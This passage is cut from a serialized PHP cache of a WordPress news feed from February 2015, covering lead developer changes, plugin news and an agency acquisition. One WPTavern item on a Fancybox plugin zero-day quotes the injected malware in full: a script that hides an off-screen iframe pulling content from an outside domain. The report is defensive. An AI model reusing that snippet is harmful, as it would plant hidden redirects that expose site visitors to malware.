changes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8385\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://poststatus.com/wordpress-lead-developer-changes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4131:\"<p>Yesterday, <a href=\"https://make.wordpress.org/core/2015/02/03/new-lead-developers-helen-and-dion/\">it was announced</a> that Helen Hou-Sandí and Dion Hulse are now lead developers of the WordPress project. That announcement, we learned today, is tied to another: that Peter Westwood and Ryan Boren <a href=\"https://make.wordpress.org/core/2015/02/04/new-chapters-for-ryan-and-westi/\">are stepping down</a> from their lead developer roles.</p>\n<p>Peter and Ryan have been enormously influential on the project.</p>\n<p>Ryan Boren has been committing to the WordPress codebase for over 11 years (aka: since the beginning), and has more commits &#8212; 7,961 according to Open Hub &#8212; than anyone. Peter has been committing for 7 years, and has 1,261 commits to his name. However, a lead developer&#8217;s influence goes well beyond commit; they are the guardians of the project.</p>\n<p>Both Ryan and Peter have been more quiet lately than years prior. Andrew Nacin describes it like so:</p>\n<blockquote><p>For some time now, Ryan and Peter have avoided weighing in on technical matters. Very simply, when you aren’t able to be active in development, you know you’re not up to speed, and you realize your words shouldn’t carry the weight that they do. Being able to make this <a href=\"http://nacin.com/2014/02/07/how-wordpress-chooses-committers/\">judgment</a> is one of the things that makes both of them such great leaders.</p></blockquote>\n<p>Peter will step into an emeritus role:</p>\n<blockquote><p>Peter will be moving into a dormant/inactive/emeritus status. We hope to have him back when his life and work allows. In the meantime, you may see him committing a bug fix here and there, as he is wont to do.</p></blockquote>\n<p>Ryan has shifted his focus, however, and is concentrating fully on UX in WordPress:</p>\n<blockquote><p>Ryan has been focusing all of his energy on improving UX for more than a year, especially for mobile and touch devices, and especially for workflows like media management. So I’m pleased to say he’ll continue to do that:<strong>Ryan will be spearheading UX for WordPress in 2015.</strong> It’s been a while since we’ve had someone truly focusing on just UX, so this is really exciting.</p></blockquote>\n<p>With this shift, Helen and Dion are stepping into official roles to represent their enormous impact on the project over the last several years.</p>\n<p>(Note: this bit of the post will look familiar to Club members)</p>\n<p>Helen works for <a href=\"http://10up.com/\">10up</a>, a WordPress consulting agency, and spends nearly 100% of her time on the WordPress.org project. She <a href=\"https://make.wordpress.org/core/2012/12/18/commit-promotions/\">received commit access</a> in late 2012, at the beginning of the 3.6 release cycle. You can follow <a href=\"https://twitter.com/helenhousandi\">@helenhousandi</a> on Twitter, and <a href=\"http://helenhousandi.com/\">visit her website</a> as well.</p>\n<p>These are the first additions to the list of lead developers for WordPress since Andrew Nacin became a lead in 2012, before the WordPress 3.5 release.</p>\n<p>I asked Andrew Nacin how these decisions are made, and he responded with the following:</p>\n<blockquote>\n<p class=\"p1\"><span class=\"s1\">After each release, the lead developers review the current list of guest committers, potentially propose new committers, etc. Any proposals are finalized through consensus.</span></p>\n</blockquote>\n<p>This is a big honor and an uncommon occurrence for the WordPress project. Major congratulations are due to both Helen and Dion.</p>\n<p>Also, we all owe Peter and Ryan a huge round of applause and thanks for their contributions &#8212; past, present, and future &#8212; to the WordPress project.</p>\n<p>The WordPress.org <a href=\"https://wordpress.org/about\">About</a> page maintains the list of lead developers for WordPress, and with yesterday and today&#8217;s announcement, we&#8217;re back to five Lead Developers plus Matt Mullenweg as Project Lead. The website now reflects these changes, with fancy (and totally serious) titles for the new lead developers.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 22:52:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38478\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3172:\"<p>Four hours ago, users seeking support on WordPress.org <a href=\"https://wordpress.org/support/topic/possible-malware-2?replies=41\" target=\"_blank\">reported malware injected into their sites</a> from an unknown source. The vulnerability allows for an iframe to be injected, redirecting to a &#8220;203koko&#8221; site.</p>\n<pre class=\"brush: xml; light: true; title: ; notranslate\">\n&lt;script&gt;/*&lt;![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(\' &lt;div style=\"position:absolute;left:-2000px;width:2000px\"&gt;&lt;iframe src=\"http://203koko.eu/hjnfh/ipframe2.php\" width=\"20\" height=\"30\" &gt;&lt;/iframe&gt;&lt;/div&gt;\');}/*]]&gt;*/&lt;/script&gt;\n</pre>\n<p>After working together to determine the plugins they have in common, users identified <a href=\"https://wordpress.org/plugins/fancybox-for-wordpress/\" target=\"_blank\">Fancybox for WordPress</a> as the culprit. It has since been temporarily removed from the WordPress Plugins Directory, as it hasn&#8217;t been updated for two years and poses a security threat to users. The plugin has received more than half a million downloads and is likely in use on thousands of WordPress sites.</p>\n<p><a href=\"https://kovshenin.com/\" target=\"_blank\">Konstantin Kovshenin</a> and <a href=\"http://codeseekah.com/\" target=\"_blank\">Gennady Kovshenin</a> worked together to analyze sites from affected users to confirm the vulnerability. There is currently no patch, so users of the plugin are advised to turn it off immediately.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>If you are running Fancybox for <a href=\"https://twitter.com/hashtag/WordPress?src=hash\">#WordPress</a> turn it off now! It contains a persistent XSS <a href=\"https://twitter.com/hashtag/vulnerability?src=hash\">#vulnerability</a> <a href=\"https://twitter.com/hashtag/security?src=hash\">#security</a> <a href=\"https://twitter.com/hashtag/infosec?src=hash\">#infosec</a></p>\n<p>&mdash; Gennady Kovshenin (@soulseekah) <a href=\"https://twitter.com/soulseekah/status/563054468183654400\">February 4, 2015</a></p></blockquote>\n<p></p>\n<p>Analysts at Sucuri have <a href=\"http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html\" target=\"_blank\">confirmed via Website Firewall logs</a> that the vulnerability is being actively exploited:</p>\n<blockquote><p>After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site. Because it is currently unpatched, we will not disclose more information.</p>\n<p>What makes things worse, is that it’s being actively exploited in the wild, leading to many compromised websites.</p></blockquote>\n<p>Users who have this plugin installed on their sites have no other option than to disable it, as no patch is available yet. The plugin&#8217;s author, <a href=\"https://twitter.com/moskis\" target=\"_blank\">José Pardilla</a>, is aware of the issue and <a href=\"https://wordpress.org/support/topic/not-safe-2?replies=3\" target=\"_blank\">responded to an affected user</a> five hours ago in the plugin&#8217;s forum on WordPress.org. A patch should be forthcoming.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 20:57:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: WordPress.com Adds Google Analytics for Business Customers Only\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38461\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://wptavern.com/wordpress-com-adds-google-analytics-for-business-customers-only\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3378:\"<p>Last week WordPress.com <a href=\"http://en.blog.wordpress.com/2015/01/29/google-analytics-for-wordpress-com-business-sites/\" target=\"_blank\">announced</a> that Google Analytics is now available for its customers on the <a href=\"https://wordpress.com/plans/\" target=\"_blank\">business tier</a>, which is priced at $299.00 per year. Users have been <a href=\"http://en.forums.wordpress.com/topic/google-analytics-please/page/3?replies=107\" target=\"_blank\">clamoring for the feature</a> for years. While many enjoy using the built-in Stats feature, it is severely limited in comparison to Google Analytics and the data is not portable if the user moves to another publishing platform.</p>\n<p>Business customers can now enter a GA tracking ID under Settings → Analytics screen in the new site management area.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/google-analytics-wpdotcom.png\" rel=\"prettyphoto[38461]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/google-analytics-wpdotcom.png?resize=1025%2C668\" alt=\"google-analytics-wpdotcom\" class=\"aligncenter size-full wp-image-38468\" /></a></p>\n<p>Access to setting up Google Analytics was added to the new backend administration area. Automattic CEO Matt Mullenweg confirms in the comments that all future new features will bypass the old /wp-admin dashboard in favor of the new interface.</p>\n<p>&#8220;[There are] no plans to put any new features into the wp-admin dashboard, beyond what comes from core updates from the open source side,&#8221; Mullenweg <a href=\"http://en.blog.wordpress.com/2015/01/29/google-analytics-for-wordpress-com-business-sites/#comment-217148\" target=\"_blank\">replied</a> to a comment on the post.</p>\n<p>&#8220;You don’t have to stop using wp-admin, and it’s not going anywhere, it’s just not where we’re focusing our energy right now,&#8221; he said, in response to a user&#8217;s confusion about the two separate admin areas. &#8220;As you’ve probably noticed, most of our new updates and iterations are happening in the new interface. You’ll see lots of improvements there in the coming months.&#8221;</p>\n<p>Users on the free and premium plans were disappointed that Google Analytics will not be available for all, given that it&#8217;s a free service. WordPress.com opted to limit the feature to business customers in order to make it more compelling for users to upgrade to the highest pricing tier. They have taken to the WordPress.com support forums to express <a href=\"http://en.forums.wordpress.com/topic/google-analytics-for-all?replies=2\" target=\"_blank\">dissatisfaction</a> in the feature&#8217;s restriction.</p>\n<p>In the past, users have adapted various <a href=\"http://en.forums.wordpress.com/topic/you-can-run-google-analytics-on-a-wordpresscom-blog-heres-how?replies=1\" target=\"_blank\">jerry-rigged methods of adding Google Analytics to WordPress.com sites</a>, using a mapped domain with Cloudflare + Google Analytics enabled. While this is a proven <a href=\"http://jonathonbalogh.com/2012/05/07/how-to-use-google-analytics-on-a-wordpress-com-blog/\" target=\"_blank\">solution</a> for adding the tracking code, it requires using a custom domain with WordPress.com, as well as the ability to follow a few technical instructions. At this time, there is no easy way to add Google Analytics to the bottom tier accounts.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 20:16:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Personalize Profile Headers with the BuddyPress Cover Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38414\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/personalize-profile-headers-with-the-buddypress-cover-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3220:\"<p>Cover photos in user profiles is a design feature in place on many major social networking sites, including Facebook, Twitter, and G+. Users enjoy having the ability to further personalize their profiles beyond the default square avatar. Twitter was one of the last to add this feature to timelines in 2012, and when it did, everyone excitedly rushed to <a href=\"http://mashable.com/2012/09/18/how-to-change-twitter-header-image/\" target=\"_blank\">personalize their header images</a>.</p>\n<p>The <a href=\"https://wordpress.org/plugins/bp-cover/\" target=\"_blank\">BuddyPress Cover</a> plugin was created to bring this feature to BuddyPress sites. It allows users to upload a cover image and adapts nicely to nearly every theme.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover.png\" rel=\"prettyphoto[38414]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover.png?resize=724%2C489\" alt=\"bp-cover\" class=\"aligncenter size-full wp-image-38422\" /></a></p>\n<p>In addition to the AJAX image upload capabilities, the plugin allows the user to drag the image to re-position it. If the image exceeds the maximum file size, the user will see a warning at the top of the page, prompting him to select another. Believe it or not, the plugin even supports animated gifs as cover images.</p>\n<p>BuddyPress Cover also integrates with the activity stream to post an update when a user adds a new cover photo, similar to what you might see on Facebook.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover-activity-update.png\" rel=\"prettyphoto[38414]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover-activity-update.png?resize=644%2C471\" alt=\"bp-cover-activity-update\" class=\"aligncenter size-full wp-image-38440\" /></a></p>\n<p>I tested the plugin with multiple themes and found that it basically inherits the styles and widths included in your active theme. Most likely you won&#8217;t have anything to worry about in terms of theme compatibility. The only thing I noticed is that user profile pictures will need to be larger than 140px square or else the plugin will show the mystery man in the header.</p>\n<p>The plugin&#8217;s author plans to add the same capabilities to groups so that admins add cover photos to personalize group pages. So far the plugin has received excellent reviews and users are eager to see more features added to it.</p>\n<p>User suggestions for future releases include the ability to select from previously uploaded cover photos and auto-cropping of the photo in activity updates to match the size shown in the cover area. The developer is open to suggestions and has already pushed out a few point releases in response to bug reports and requests.</p>\n<p>The BuddyPress Cover plugin is a valuable addition to any developer&#8217;s toolbox, as clients will often request features they have seen on other social networks. If you&#8217;re looking to add greater customization capabilities to user profiles while maintaining the clean design of your theme, this plugin fits the bill. You can <a href=\"https://wordpress.org/plugins/bp-cover/\" target=\"_blank\">download</a> it from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 00:03:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"Matt: World Pun Championships\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44646\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"http://ma.tt/2015/02/world-pun-championships/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:848:\"<blockquote><p>The Pun-Off, held annually since 1978, matches the peculiar energy of a place where the unofficial slogan is &#8220;Keep Austin Weird.&#8221; This is the city, after all, that organizes Eeyore&#8217;s Birthday Party, an outdoor costume party honoring the depressed donkey from Winnie-the-Pooh. [&#8230;]</p>\n<p>It&#8217;s a reunion of legends past. Steve Brooks, a country singer with a mop of gray hair, is the only other person besides Ziek to have won both Punslingers and Punniest of Show in the same year. Retired from competition, he now serves as a judge and emcee.</p></blockquote>\n<p><a href=\"http://www.laweekly.com/news/at-the-world-pun-championships-victory-is-easier-said-than-punned-4767308\">Everything about this article about the World Pun Championships in Austin is amazing</a>, I want to quote the entire thing.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 23:58:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: Is WordPress Suffering From The Innovator’s Dilemma?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38412\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/is-wordpress-suffering-from-the-innovators-dilemma\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4845:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovationDilemmaFeaturedImage.png\" rel=\"prettyphoto[38412]\"><img class=\"size-full wp-image-38420\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovationDilemmaFeaturedImage.png?resize=631%2C323\" alt=\"Innovation Dilemma Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/37996588780@N01/273978773\">Scrabble</a> &#8211; <a href=\"https://creativecommons.org/licenses/by-sa/2.0/\">(license)</a>\n<p>I&#8217;ve used WordPress for more than seven years and I can&#8217;t think of any features it has that are innovative. I believe part of the reason is that I&#8217;ve been stuck in the WordPress bubble for so long, I haven&#8217;t been exposed to different ways of doing things. I only know the WordPress way and that&#8217;s a dangerous way of thinking.</p>\n<h2>The Innovator&#8217;s Dilemma</h2>\n<p>In 1997, <a class=\"mw-redirect\" title=\"Clayton Christensen\" href=\"http://en.wikipedia.org/wiki/Clayton_Christensen\">Clayton Christensen</a> published the <a title=\"http://en.wikipedia.org/wiki/The_Innovator%27s_Dilemma\" href=\"http://en.wikipedia.org/wiki/The_Innovator%27s_Dilemma\">Innovator&#8217;s Dilemma</a>. The book suggests that successful <a class=\"mw-redirect\" title=\"Companies\" href=\"http://en.wikipedia.org/wiki/Companies\">companies</a> can put too much emphasis on customers current needs, and fail to adopt new technology or business models that will meet their customer&#8217;s unstated or future needs. Christensen argues that such companies will eventually fall behind.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovatorsDilemma.png\" rel=\"prettyphoto[38412]\"><img class=\"size-full wp-image-38419\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovatorsDilemma.png?resize=571%2C466\" alt=\"Book Cover to Innovators Dilemma\" /></a>Book Cover to Innovators Dilemma\n<p>During his appearance at PressNomics, <a title=\"https://twitter.com/jeffr0/status/558778370792493056\" href=\"https://twitter.com/jeffr0/status/558778370792493056\">Matt Mullenweg said</a> that he’s, “worried we have become too much of an inward facing community and afraid to make a painful leap forward to make the next WordPress.” His statement is open to interpretation, but if you compare the WordPress open source project to a company and its users to customers, perhaps what he&#8217;s referring to is the idea that WordPress has fallen into the innovator&#8217;s dilemma.</p>\n<h2>External Innovation</h2>\n<p>In the Advanced WordPress Facebook group,  Joost de Valk responded to Mullenweg&#8217;s statement with, &#8220;Most innovation is done outside in, not inside out. But to be honest Matt, that’s where the problem lies too. The &#8216;inside&#8217; is very negative towards change, and is constantly throwing up hurdles. They like small incremental steps, but fear bigger ones.&#8221;</p>\n<p>Core WordPress development is done by a trusted team of people who have remained in core decision-making positions for years. It&#8217;s rare that an individual new to the community gets commit access or even gets to lead a release within two years.</p>\n<p>I don&#8217;t think it&#8217;s impossible, but if brand new contributors from outside of the WordPress bubble have little to no influence on the project, where is the opportunity for external innovation?</p>\n<h2>Leading by Example</h2>\n<p>Another statement Mullenweg made at PressNomics is that he wants to lead another release. Leading a release gives him the opportunity to lead by example and push for big changes, something he feels the community fears.</p>\n<h2>A Thought Experiment</h2>\n<p>What do you think are innovative features in WordPress? I&#8217;m especially curious to see how users answer the question versus developers. I&#8217;d also like to know what features in other publishing systems WordPress could learn from. An excellent example is the post editor in Medium which Mullenweg <a title=\"https://twitter.com/jeffr0/status/558777784932118531\" href=\"https://twitter.com/jeffr0/status/558777784932118531\">has admitted</a> offers a better experience than WordPress.</p>\n<h2>Can WordPress Avoid Irrelevance?</h2>\n<p>The road to 50% market share is tough and to some, <a title=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share#comment-63337\" href=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share#comment-63337\">is impossible</a> to achieve. Without innovation and continuous improvements to satisfy the needs of users, it&#8217;s entirely possible for WordPress to develop itself into irrelevance. Then again, what could WordPress developers do today to prevent this from happening? Is it a matter of changing philosophies and strategies or is it something else?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 23:20:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Human Made Acquires Australian Based WordPress Agency Sennza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38401\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2074:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/08/MergeFeaturedImage.png\" rel=\"prettyphoto[38401]\"><img class=\"size-full wp-image-28143\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/08/MergeFeaturedImage.png?resize=678%2C252\" alt=\"Merge Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/rutlo/3743291132/\">rutlo</a> &#8211; <a href=\"http://creativecommons.org/licenses/by/2.0/\">cc</a>\n<p><a title=\"http://hmn.md/\" href=\"http://hmn.md/\">Human Made</a> has acquired Australian based WordPress development agency <a title=\"http://www.sennza.com.au/\" href=\"http://www.sennza.com.au/\">Sennza</a>. Human Made is a development shop with more than 20 employees and has offices scattered across the world. They&#8217;re also a <a title=\"http://vip.wordpress.com/partners/\" href=\"http://vip.wordpress.com/partners/\">WordPress.com VIP partner</a>. Sennza and its three employees will continue to work from their office and become Human Made Australia.</p>\n<p>The move gives Human Made an opportunity to tap into the enterprise market in Australia as well as help out with other projects across Asia, India, and the US West Coast. According to <a title=\"http://www.sennza.com.au/2015/02/03/sennza-joining-human-made/\" href=\"http://www.sennza.com.au/2015/02/03/sennza-joining-human-made/\">Sennza&#8217;s announcement</a>, talks of the acquisition began at WordCamp Europe in Sofia, Bulgaria.</p>\n<blockquote><p>Although we had met and spoken with Human Made previously, we got the chance to really meet and hang out with most of the team while at 